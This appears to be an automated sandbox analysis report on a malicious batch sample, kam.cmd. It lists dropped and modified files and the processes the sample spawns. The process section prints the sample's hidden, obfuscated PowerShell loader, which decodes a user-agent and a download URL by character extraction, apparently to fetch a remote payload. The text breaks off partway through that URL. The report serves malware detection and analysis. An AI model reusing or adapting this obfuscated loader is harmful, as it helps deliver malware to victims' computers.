Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
kam.cmd
|
ASCII text, with very long lines (6364), with no line terminators
|
initial sample
|
 |
|
|
C:\Program Files (x86)\AutoIt3\Au3Check.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Au3Info.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Uninstall.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\chrome.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Windows\svchost.com
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3582-490\wab.exe
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bhgphdw.1ud.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huheq42j.rpm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t42yux4w.3ae.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yovubrcq.imu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmp5023.tmp
|
Non-ISO extended-ASCII text, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Roaming\Klavers.Uen
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MLVP4399Z0N1N4Y5GS3Y.temp
|
data
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 155 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte
-lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function
Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/
Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl
Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver
Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x
Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe
';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep
